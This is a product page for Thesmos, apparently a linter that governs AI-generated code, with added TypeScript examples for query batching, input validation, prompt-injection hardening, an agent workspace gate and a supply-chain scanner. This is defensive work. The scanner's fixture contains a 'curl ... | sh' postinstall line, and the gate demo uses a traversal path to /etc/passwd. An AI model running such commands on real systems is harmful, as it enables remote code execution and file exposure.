HolleyStudios
Open Source · FSL-1.1 · v3.6.0 · 1,075 Rules

PROMETHEUS

AI gives your code the speed of gods. Thesmos gives it their wisdom.

npm install --save-dev thesmos-governance

1,075 Rules · 12 Ecosystems · 6 Gov. Pillars · 0 Config

In Greek myth, Prometheus stole fire from the gods and gave it to humanity. AI coding tools gave humanity the same fire: raw speed, infinite generation. But fire without governance burns. Thesmos enforces the rules the gods of Olympus kept for themselves: security, correctness, architectural integrity, and AI safety.

Real Findings in AI-Generated Code

This is what Thesmos catches.

BLOCKER · AI_013

Prompt Injection via User Input

const res = await llm(systemPrompt + userMessage)

User input concatenated directly into the system prompt. Allows adversarial prompt injection.

src/api/ai/chat.ts:34

BLOCKER · ZOD_008

Missing Input Validation

const { amount } = await req.json()

No Zod schema on POST route body. Unvalidated data reaches the database.

src/app/api/orders/route.ts:12

HIGH · DB_003

N+1 Query Pattern

orders.map(async o => await prisma.item.findMany(...))

Prisma queries inside a loop: one round-trip to load the orders, then one more per order. 100 orders = 101 database round-trips.

src/components/OrderList.tsx:22
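Hardened forms of the three findings above, as an added example that is neither Thesmos code nor code from the scanned project. The Prisma client is a constructed in-memory stand-in that counts round-trips; the body validation is hand-written (a Zod schema would express the same checks declaratively); and the 1,000,000 amount ceiling and the 8,000-character cap on a user turn are assumed limits.

```typescript
// Added example, not Thesmos code: hardened forms of AI_013, ZOD_008 and DB_003.
type Order = { id: number };
type Item = { id: number; orderId: number; sku: string };
type ItemWhere = { orderId: number | { in: number[] } };

// Constructed stand-in for a Prisma client: each findMany is one DB round-trip.
export function makeFakeDb(items: Item[]) {
  let roundTrips = 0;
  return {
    roundTrips: () => roundTrips,
    reset: () => { roundTrips = 0; },
    item: {
      async findMany(args: { where: ItemWhere }): Promise<Item[]> {
        roundTrips++;
        const w = args.where.orderId;
        const ids = typeof w === "number" ? [w] : w.in;
        return items.filter((i) => ids.includes(i.orderId));
      },
    },
  };
}
type Db = ReturnType<typeof makeFakeDb>;

// DB_003 as written: one query per order, so N orders cost N round-trips
// (on top of the one that loaded the orders themselves).
export async function loadItemsNPlusOne(db: Db, orders: Order[]): Promise<Map<number, Item[]>> {
  const out = new Map<number, Item[]>();
  for (const o of orders) {
    out.set(o.id, await db.item.findMany({ where: { orderId: o.id } }));
  }
  return out;
}

// Fix: one query with `in`, then group in memory. One round-trip for any N.
export async function loadItemsBatched(db: Db, orders: Order[]): Promise<Map<number, Item[]>> {
  const out = new Map<number, Item[]>(orders.map((o): [number, Item[]] => [o.id, []]));
  if (orders.length === 0) return out;
  const rows = await db.item.findMany({ where: { orderId: { in: orders.map((o) => o.id) } } });
  for (const r of rows) out.get(r.orderId)?.push(r);
  return out;
}

// ZOD_008 fix, hand-written: reject the body before it reaches the database.
// (A Zod schema would express the same checks declaratively.)
export type OrderBody = { amount: number };
export type Parsed = { ok: true; value: OrderBody } | { ok: false; error: string };
const MAX_AMOUNT = 1000000; // assumed business ceiling
export function parseOrderBody(raw: unknown): Parsed {
  if (typeof raw !== "object" || raw === null) return { ok: false, error: "body must be a JSON object" };
  const amount = (raw as Record<string, unknown>).amount;
  if (typeof amount !== "number" || !Number.isFinite(amount)) return { ok: false, error: "amount must be a finite number" };
  if (amount <= 0 || amount > MAX_AMOUNT) return { ok: false, error: "amount out of range" };
  return { ok: true, value: { amount } };
}

// AI_013 fix: never splice user text into the system prompt; send it as its own
// user turn so the role boundary survives for the model and for audit logs.
const MAX_USER_CHARS = 8000; // assumed cap on a single user turn
export function buildChatRequest(systemPrompt: string, userMessage: string) {
  return {
    messages: [
      { role: "system" as const, content: systemPrompt },
      { role: "user" as const, content: userMessage.slice(0, MAX_USER_CHARS) },
    ],
  };
}

// Constructed data: 100 orders with one item each.
export async function demo(): Promise<{ slow: number; fast: number }> {
  const orders: Order[] = Array.from({ length: 100 }, (_, i) => ({ id: i + 1 }));
  const items: Item[] = orders.map((o) => ({ id: o.id * 10, orderId: o.id, sku: `SKU-${o.id}` }));
  const db = makeFakeDb(items);
  await loadItemsNPlusOne(db, orders);
  const slow = db.roundTrips();
  db.reset();
  await loadItemsBatched(db, orders);
  const fast = db.roundTrips();
  return { slow, fast }; // { slow: 100, fast: 1 }
}
```

The round-trip counter is the useful part: the batched loader issues one `findMany` whatever the order count, while the loop version scales with it. The validator deliberately fails closed on anything that is not a finite positive number, which is what stops a string, `NaN` or `Infinity` from reaching the database.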

1,075 Total rules · 12 Ecosystems · 6 Governance pillars · v3.6 Current version

Full AI-Stack Governance

Beyond linting. Every layer of your AI stack.

🔍 Scan & Health Score

thesmos scan grades your codebase A+ through F. Every finding categorised by severity across 6 governance pillars.

🤖 Autopilot

Natural language to executed code. thesmos autopilot generate 'add Stripe checkout' plans, branches, builds, and self-reviews.

AI Adapters

thesmos adapters syncs governance rules to Claude, Cursor, Copilot, Gemini, and Codex — one command, every AI tool aligned.

🧠 Compaction Brain

Generates .thesmos/brain.md — context that survives Claude Code's compaction so Thesmos remembers architecture decisions, suppressions, and open investigations.

🔮 Learning Brain (BYOK)

Observe → analyze → propose → approve → promote. Uses your own Anthropic API key to surface high false-positive rules, propose custom rules, and scaffold them into TypeScript stubs via brain:promote. Always opt-in, cost-capped.

📚 Prompt Library

Pre-built prompts for security remediation, PR review prep, health recovery, and onboarding. Auto-suggested after each scan when conditions match.

🏗️ Builder Wizard

8-question guided wizard builds agents, skills, dashboards, RAG pipelines, and workflows. Codebase-aware — reads your stack, pre-fills answers. Governance-scans everything it generates.

🔄 Self-Governance

Thesmos governs itself. Detects stale hooks, outdated installs, old adapters, and aged brain snapshots. thesmos self:check reports them and thesmos self:repair fixes them automatically.

🛡️ Agent Scope Enforcement

Prevents AI agents from writing outside defined workspace boundaries. Every Bash and Write call intercepted before it runs.
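One way to implement the boundary check described above, as an added example rather than Thesmos's own hook code. It resolves the requested path lexically and then through the filesystem, so a symlink inside the workspace that points outside it is rejected too. The tool-call shape, the workspace root and the demo paths are assumptions; for Bash only the working directory is checked, the command string is not parsed.

```typescript
// Added example, not Thesmos's hook code: a workspace-boundary gate for agent
// tool calls. Tool-call shape, workspace root and demo paths are assumptions.
import * as fs from "node:fs";
import * as os from "node:os";
import * as path from "node:path";

export type Verdict = { allow: true; resolved: string } | { allow: false; reason: string };

// Lexical check: the target must resolve to a path at or below `root`.
// Uses path.relative instead of a string-prefix test, so "/ws-evil" is not
// accepted for root "/ws", and "../" segments are collapsed before comparing.
export function checkWithinWorkspace(root: string, target: string, cwd: string = root): Verdict {
  const absRoot = path.resolve(root);
  const abs = path.isAbsolute(target) ? path.normalize(target) : path.resolve(cwd, target);
  const rel = path.relative(absRoot, abs);
  if (rel === ".." || rel.startsWith(".." + path.sep) || path.isAbsolute(rel)) {
    return { allow: false, reason: `path escapes workspace: ${target}` };
  }
  return { allow: true, resolved: abs };
}

// Filesystem check: resolve symlinks on the nearest existing ancestor, so a
// link inside the workspace that points outside it is also rejected.
export function realpathWithin(root: string, target: string, cwd: string = root): Verdict {
  const lexical = checkWithinWorkspace(root, target, cwd);
  if (!lexical.allow) return lexical;
  const realRoot = fs.realpathSync(path.resolve(root)); // the workspace root must exist
  let existing = lexical.resolved;
  const tail: string[] = [];
  while (!fs.existsSync(existing)) {
    tail.unshift(path.basename(existing));
    const parent = path.dirname(existing);
    if (parent === existing) break; // reached the filesystem root
    existing = parent;
  }
  const real = path.join(fs.realpathSync(existing), ...tail);
  return checkWithinWorkspace(realRoot, real);
}

// Assumed tool-call shape. For Bash only the working directory is checked;
// the command string itself is not parsed in this example.
export type ToolCall =
  | { tool: "Write"; path: string }
  | { tool: "Bash"; cwd: string; command: string };

export function gateToolCall(root: string, call: ToolCall): Verdict {
  switch (call.tool) {
    case "Write":
      return realpathWithin(root, call.path);
    case "Bash":
      return realpathWithin(root, call.cwd);
    default: {
      const unreachable: never = call;
      throw new Error(`unknown tool call ${JSON.stringify(unreachable)}`);
    }
  }
}

// Demo against the temp directory as workspace (constructed paths).
export function demo(): { inside: boolean; traversal: boolean; sibling: boolean } {
  const root = os.tmpdir();
  return {
    inside: gateToolCall(root, { tool: "Write", path: path.join(root, "demo-ws", "src", "new.ts") }).allow,
    traversal: gateToolCall(root, { tool: "Write", path: path.join(root, "..", "etc", "passwd") }).allow,
    sibling: gateToolCall(root, { tool: "Bash", cwd: root + "-evil", command: "ls" }).allow,
  }; // { inside: true, traversal: false, sibling: false }
}
```

Two details matter in practice: a prefix test such as `abs.startsWith(root)` accepts `/ws-evil` for root `/ws`, which is why `path.relative` is used, and a lexical check alone cannot see through a symlink, which is why the realpath pass walks up to the nearest existing ancestor before comparing.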

📦 Supply Chain Guard

10 rules covering lockfile integrity, registry poisoning, postinstall network fetches, and typosquatting. Flags phantom packages before they ship.

💰 Token Budget Governance

Per-session and daily AI cost caps with alert and hard-stop thresholds. Every tool call logged to .thesmos/token-usage.jsonl.

✉️ Commit + Vercel Governance

Enforces Conventional Commits on every commit-msg hook. Validates Vercel config for secret leaks, missing CRON_SECRET, and redirect patterns.

Thesmos Autopilot

Branch. Build. Journal.

Describe a feature in plain language. Autopilot creates a branch, executes the plan step by step, journals every decision, and self-reviews against all 1,075 governance rules before surfacing a PR.

Every action is logged. Every rule checked. If governance fails mid-session, Autopilot pauses and asks — it never ships a BLOCKER.

thesmos autopilot generate "add Stripe checkout"
🌿 Plan

Converts natural language into a governed task graph. Each step scoped, reversible, and rule-checked.

⚙️ Execute

Runs each task with full tool access — file edits, shell commands, test runs — all within agent scope limits.

📓 Journal

Every decision logged to .thesmos/autopilot/journal.md. Every rule evaluated. Full audit trail.

🔍 Review

Self-reviews the diff against 1,075 rules before opening the PR. No BLOCKER reaches main.

See It Run

What thesmos scan looks like.

Why Thesmos is Different

Every other platform gives you instructions.
Thesmos gives you governance.

⚖️ Governed Outputs

Every God Agent output is checked against 1,075 Thesmos rules and carries a governance badge. Ship confidence, not hope.

🗡️ Built-in Challenger

God Agent Momus challenges every major decision before it executes. The only agent platform with a permanent devil's advocate.

The God Council

When agents conflict, God Agent Zeus arbitrates. One decision. Clear ownership. No agent debates that block execution.

🌊 Drift Detection

God Agent Proteus monitors your product, prompts, and architecture for drift. Know when you've strayed from the plan before it costs you a sprint.

Capability comparison: ChatGPT GPTs · Cursor Agents · Claude Projects · Thesmos God Agents
  • Governance-checked outputs
  • Built-in challenger agent
  • Cross-agent arbitration
  • Drift detection
  • Calibrated confidence markers (Partial)
  • Adversarial self-check
  • BYOK / zero surveillance (N/A · N/A · N/A)

The 40 God Agents

Every agent output is Thesmos-governed.

40 expert AI specialists — Zeus, Athena, Ares, Hermes, and 36 more — each with deep domain methodology and Thesmos governance baked into every output. Zeus, Athena, and Argus are free. All 40 available with Pantheon Pro.

What It Covers

1,075 rules across every layer of your AI stack.

Security + DAST

130+ rules
  • SQL injection
  • SSRF
  • open redirect
  • path traversal
  • JWT decode without verify

AI Safety

65+ rules
  • Prompt injection via user input
  • LLM key in client bundle
  • AI output used as HTML
  • unvalidated LLM JSON

Authentication

45+ rules
  • Missing auth middleware
  • userId from request body
  • JWT algorithm none
  • hardcoded credentials

Next.js / React

90+ rules
  • cookies() in client component
  • useEffect async callback
  • window in SSR
  • conditional hook call

Supply Chain

10+ rules
  • git:// scheme in package.json
  • missing lockfile
  • postinstall network fetch
  • non-HTTPS registry
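Checks in the spirit of the Supply Chain list above and the Supply Chain Guard feature, as an added example that is not Thesmos's rule code. The rule IDs (SC_001 to SC_005), the finding shape, the lockfile names, the short list of well-known packages used for the typosquat check, and both sample projects are constructed for the demo. Phantom-package detection needs a registry lookup and is not shown.

```typescript
// Added example, not Thesmos's rule code. Rule IDs, finding shape, lockfile
// names, the well-known-package list and the sample projects are constructed.
export type Finding = { rule: string; severity: "BLOCKER" | "HIGH"; message: string };

export type Manifest = {
  dependencies?: Record<string, string>;
  devDependencies?: Record<string, string>;
  scripts?: Record<string, string>;
};

export type ProjectFiles = {
  packageJson: Manifest;
  npmrc?: string;       // contents of .npmrc, if present
  lockfiles: string[];  // lockfile names found at the project root
};

const LOCKFILES = ["package-lock.json", "npm-shrinkwrap.json", "yarn.lock", "pnpm-lock.yaml", "bun.lockb"];
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
const NETWORK_FETCH = /\b(curl|wget|Invoke-WebRequest)\b|\bfetch\(|https?:\/\//i;
// Small constructed list; a real check would rank by registry download counts.
const WELL_KNOWN = ["express", "lodash", "react", "axios", "next", "zod"];

// Levenshtein distance, used to spot names one typo away from a popular package.
function editDistance(a: string, b: string): number {
  const dp: number[][] = Array.from({ length: a.length + 1 }, (_, i) =>
    Array.from({ length: b.length + 1 }, (_, j) => (i === 0 ? j : j === 0 ? i : 0)));
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      dp[i][j] = Math.min(dp[i - 1][j] + 1, dp[i][j - 1] + 1, dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));
    }
  }
  return dp[a.length][b.length];
}

export function scanSupplyChain(files: ProjectFiles): Finding[] {
  const out: Finding[] = [];
  const deps = { ...files.packageJson.dependencies, ...files.packageJson.devDependencies };

  for (const [name, spec] of Object.entries(deps)) {
    // git:// and git+http:// sources are unauthenticated and carry no integrity hash
    if (/^git(\+http)?:\/\//i.test(spec)) {
      out.push({ rule: "SC_001", severity: "BLOCKER", message: `${name}: fetched over unauthenticated transport (${spec})` });
    }
    // one edit away from a well-known name, and not that name itself
    const near = WELL_KNOWN.find((w) => w !== name && editDistance(name, w) === 1);
    if (near) {
      out.push({ rule: "SC_005", severity: "HIGH", message: `${name}: possible typosquat of ${near}` });
    }
  }

  // no lockfile means no pinned versions and no integrity hashes to verify
  if (!files.lockfiles.some((f) => LOCKFILES.includes(f))) {
    out.push({ rule: "SC_002", severity: "HIGH", message: "no lockfile at project root" });
  }

  // lifecycle scripts run on every install; a network fetch there is remote code execution
  for (const hook of LIFECYCLE_HOOKS) {
    const script = files.packageJson.scripts?.[hook];
    if (script && NETWORK_FETCH.test(script)) {
      out.push({ rule: "SC_003", severity: "BLOCKER", message: `${hook} script fetches from the network: ${script}` });
    }
  }

  // a plain-HTTP registry lets an on-path attacker swap tarballs
  for (const line of (files.npmrc ?? "").split(/\r?\n/)) {
    const m = line.match(/^\s*(?:@[^:=]+:)?registry\s*=\s*(\S+)/);
    const registry = m?.[1];
    if (registry && /^http:\/\//i.test(registry)) {
      out.push({ rule: "SC_004", severity: "BLOCKER", message: `non-HTTPS registry: ${registry}` });
    }
  }
  return out;
}

// Constructed sample project with one instance of each problem.
export const sampleProject: ProjectFiles = {
  packageJson: {
    dependencies: {
      express: "^4.19.2",
      expres: "^1.0.0",
      "left-pad": "git://github.com/example/left-pad.git",
    },
    scripts: { postinstall: "curl -s https://example.invalid/setup.sh | sh", build: "tsc" },
  },
  npmrc: "registry=http://registry.example.invalid/\n@corp:registry=https://npm.corp.example/",
  lockfiles: [],
};

// Constructed clean project: should produce no findings.
export const cleanProject: ProjectFiles = {
  packageJson: { dependencies: { express: "^4.19.2" }, scripts: { build: "tsc" } },
  npmrc: "registry=https://registry.npmjs.org/",
  lockfiles: ["package-lock.json"],
};
```

The scoped `@corp:registry` line in the sample is deliberately HTTPS so the check shows it distinguishes per-scope registries from the default one; the `expres` entry is flagged while `express` itself is not, because the typosquat check skips exact matches.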

Infrastructure

20+ rules
  • FROM node:latest
  • no USER in Dockerfile
  • K8s pod with no resource limits
  • Terraform public S3 bucket

Observability

10+ rules
  • Route with no logger import
  • silent catch block
  • auth event not logged
  • DB call with no timing

Performance

60+ rules
  • N+1 queries
  • sync fs in handler
  • missing pagination
  • bundle bloat imports

Database

45+ rules
  • findMany without limit
  • multi-write without transaction
  • raw SQL injection
  • DROP TABLE migration

AI Governance

55+ rules
  • Token budget exceeded
  • Agent scope violation
  • Supply chain phantom pkg
  • AI debt fingerprint

Self-Governance

10+ rules
  • Stale thesmos install
  • broken git hook path
  • aged brain snapshot
  • outdated adapter

Packs (GDPR, CVE…)

400+ rules
  • GDPR consent gate
  • CVE-2024-xxxx pattern
  • SOC 2 audit log
  • Data residency

Get Started in Minutes

Install once. Govern everything.

01

Install

npm install --save-dev thesmos-governance

One package. Zero config. Works on any JS/TS project.

02

Scan & Grade

thesmos scan

Get your first health grade A+ through F. Every finding ranked by severity across 1,075 rules.

03

Teach Your AI

thesmos adapters

Syncs 1,075 rules to Claude, Cursor, Copilot, Gemini, and Codex — instantly.

04

Gate Every PR

thesmos review --staged

Run as a pre-commit hook or GitHub Actions step. No BLOCKER reaches main.

05

Build an Agent

thesmos build:agent

8-question wizard creates a governance-scanned AI agent for your exact stack in minutes.

06

Grow the Brain

thesmos brain:learn && thesmos brain:promote --rule=CUSTOM_001

Observe patterns, propose custom rules with your own API key, approve them, and scaffold a TypeScript rule stub in one flow.

07

Launch Autopilot

thesmos autopilot generate "add Stripe checkout"

Branch. Build. Self-review. Governed AI execution from a single prompt.

How Clients Benefit

Every project Holley Studio ships is Thesmos-verified.

When we deliver a system, you receive documentation showing every Thesmos rule checked and every BLOCKER finding resolved. You're not trusting us — you're verifying it.

For technical clients, we run Thesmos in your CI pipeline after delivery — gating every future pull request. Zero BLOCKERs reach production. Ever.

Book a call to see it live →

Real BLOCKERs caught in AI-generated code

[SEC_001] Supabase admin client in browser bundle
[SEC_002] Row Level Security disabled on tables
[AUTH_007] Admin route with no authentication middleware
[AI_001] LLM API key loaded in client component
[AI_013] User input interpolated directly into system prompt
[VIBE_002] fetch(userInput) — classic AI-generated SSRF pattern
[NEXT_003] cookies() called inside 'use client' component
[DB_001] DROP TABLE in migration without backup strategy

For Agencies

White-label your QA process.

Add Thesmos to your own agency's CI/CD pipeline. Ship AI-generated code confidently. Differentiate from competitors who can't prove their code quality.

Talk about integration →

For Developers

Run it on your own codebase.

Open source (FSL-1.1-MIT, free for personal and open source use). CLI scanner, GitHub Actions, VS Code extension, npm package. Works on any JavaScript/TypeScript project. Zero config.

View on GitHub →

The gods kept governance for themselves.

Now you have it.

1,075 rules. Zero config. Free for open source and internal use. One command away from a governed AI development workflow.

Node.js 18+ · FSL-1.1-MIT (→ MIT 2030) · Built by Holley Studio